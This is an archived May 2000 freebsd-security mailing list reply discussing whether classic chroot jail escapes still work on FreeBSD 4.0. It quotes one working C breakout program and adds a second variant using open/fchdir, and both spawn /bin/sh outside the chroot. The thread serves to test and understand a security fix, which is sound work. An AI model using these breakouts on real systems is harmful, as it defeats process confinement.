From owner-freebsd-security  Fri May 12 11:11:19 2000
Delivered-To: freebsd-security@freebsd.org
Received: from foobar.franken.de (foobar.franken.de [194.94.249.81])
	by hub.freebsd.org (Postfix) with ESMTP id C1C2937B802
	for <freebsd-security@FreeBSD.ORG>; Fri, 12 May 2000 11:11:12 -0700 (PDT)
	(envelope-from logix@foobar.franken.de)
Received: (from logix@localhost)
	by foobar.franken.de (8.8.8/8.8.5) id UAA16066;
	Fri, 12 May 2000 20:06:20 +0200 (CEST)
Message-ID: <20000512200619.A14067@foobar.franken.de>
Date: Fri, 12 May 2000 20:06:19 +0200
From: Harold Gutch <logix@foobar.franken.de>
To: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>,
	Poul-Henning Kamp <phk@critter.freebsd.dk>
Cc: Paul Hart <hart@iserver.com>, Adam Laurie <adam@algroup.co.uk>,
	freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
References: <4226.958118411@critter.freebsd.dk> <200005121319.e4CDJev40777@cwsys.cwsent.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <200005121319.e4CDJev40777@cwsys.cwsent.com>; from Cy Schubert - ITSD Open Systems Group on Fri, May 12, 2000 at 06:19:06AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, May 12, 2000 at 06:19:06AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
> chrooted environment including jail, however testing the break out of 
> jail exploit (good thing I tested before I spoke), which BTW worked on 
> FreeBSD-3 and numerous other platforms including Linux, Solaris, and 
> Tru64-UNIX, appears to no longer work under 4.0 -- which is a good 
> thing!  When did the FreeBSD chroot(2) get fixed?
> 
> Once again FreeBSD leads the way.
> 
> Following is the break-out-of-jail code.
> 
>  #include <unistd.h>
>  #include <assert.h>
> 
>  const char *shell = "/bin/sh";
>  const char *lowerdir = "/tmp";
> 
>  int main() {
>         int i;
> 
>         assert(chdir("/") != -1);
>         assert(chroot(lowerdir) != -1);
>         for (i = 0; i < 32; i++)
>                 assert(chdir("..") != -1);
>         assert(chroot(".") != -1);
> 
>         assert(execl(shell, shell, NULL) != -1);
>  };


What about the "other" chroot-breakout, does it still work under
FreeBSD 4.0?
Here's the breakout-code modulo checks wether /tmp exists etc.

#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
 
int main(int argc, char *argv[])
{
	int handle, i;
 
	handle = open("/", O_RDONLY);
	chroot("/tmp");
	chdir("/");
	fchdir(handle);
	for (i = 0; i < 32; i++)
		chdir("..");
	chroot(".");
	chdir("/");
	system("/bin/sh");

	return 0;
}

bye,
  Harold

-- 
Someone should do a study to find out how many human life spans have
been lost waiting for NT to reboot.
              Ken Deboy on Dec 24 1999 in comp.unix.bsd.freebsd.misc


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message